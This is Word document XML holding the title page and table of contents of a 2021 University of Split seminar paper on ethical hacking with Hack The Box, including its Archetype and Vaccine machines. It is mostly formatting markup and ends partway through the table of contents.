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43813" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk42179608"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="hr-HR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B2BC8DC" wp14:editId="09C582D5">
            <wp:extent cx="1179830" cy="11874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F9F6" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DD09A9" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SVEUČILIŠTE U SPLITU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC89A8B" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FAKULTET ELEKTROTEHNIKE, STROJARSTVA I BRODOGRADNJE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDDB3E5" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4B1329" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Kolegij: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Računalna forenzika</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342AE3DD" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C745233" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SEMINARSKI RAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45826237" w14:textId="63B8548F" w:rsidR="006A4EBE" w:rsidRPr="00A41C9A" w:rsidRDefault="00304607" w:rsidP="006A4EBE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HACK THE BOX ETIČNO HAKIRANJE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FEC334" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099378F6" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79942B63" w14:textId="616E3A16" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EB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Filip Ivić</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445173BE" w14:textId="7E58AFBA" w:rsidR="006A4EBE" w:rsidRPr="00CE038E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EB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Ivan Gusić</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D226C1" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30256EB7" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00896E2E" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27152997" w14:textId="3190EC88" w:rsidR="006A4EBE" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">U Splitu, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">lipanj </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE038E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCEFD8B" w14:textId="62E172B2" w:rsidR="00304607" w:rsidRDefault="00304607" w:rsidP="006A4EBE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF9EF27" w14:textId="77777777" w:rsidR="00304607" w:rsidRDefault="00304607" w:rsidP="006A4EBE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="24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121422626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</w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="71E947CA" w14:textId="0CC72D7E" w:rsidR="006A4EBE" w:rsidRPr="00C66C3B" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
          <w:pPr>
            <w:pStyle w:val="TOCNaslov"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00C66C3B">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:t>Sadržaj</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5028E4BC" w14:textId="77777777" w:rsidR="006A4EBE" w:rsidRPr="00C66C3B" w:rsidRDefault="006A4EBE" w:rsidP="006A4EBE">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:cs="Arial"/>
              <w:lang w:eastAsia="hr-HR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0CBBC181" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="006A4EBE">
          <w:pPr>
            <w:pStyle w:val="Sadraj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 w:rsidRPr="00C66C3B">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00C66C3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C66C3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75785389" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Uvod</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785389 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19FB3993" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785390" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785390 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55DC695C" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785391" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hack The Box</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785391 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03C2C7AA" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA">
          <w:pPr>
            <w:pStyle w:val="Sadraj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75785392" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hack The Box Starting Point: Archetype</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785392 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6272850B" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785393" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enumeration</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785393 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E66F15A" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785394" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Foothold</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785394 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E45FB4A" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785395" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785395 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DC60772" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA">
          <w:pPr>
            <w:pStyle w:val="Sadraj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75785396" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hack The Box Starting Point: Vaccine</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785396 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="411877C8" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785397" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:lang w:eastAsia="hr-HR"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Enumeration</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75785397 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62B8058D" w14:textId="77777777" w:rsidR="004472D0" w:rsidRDefault="00E602CA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r-HR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75785398" w:history="1">
            <w:r w:rsidR="004472D0" w:rsidRPr="004325F6">
              <w:rPr>
                <w:rStyle w:val="Hiperveza"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="004472D0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
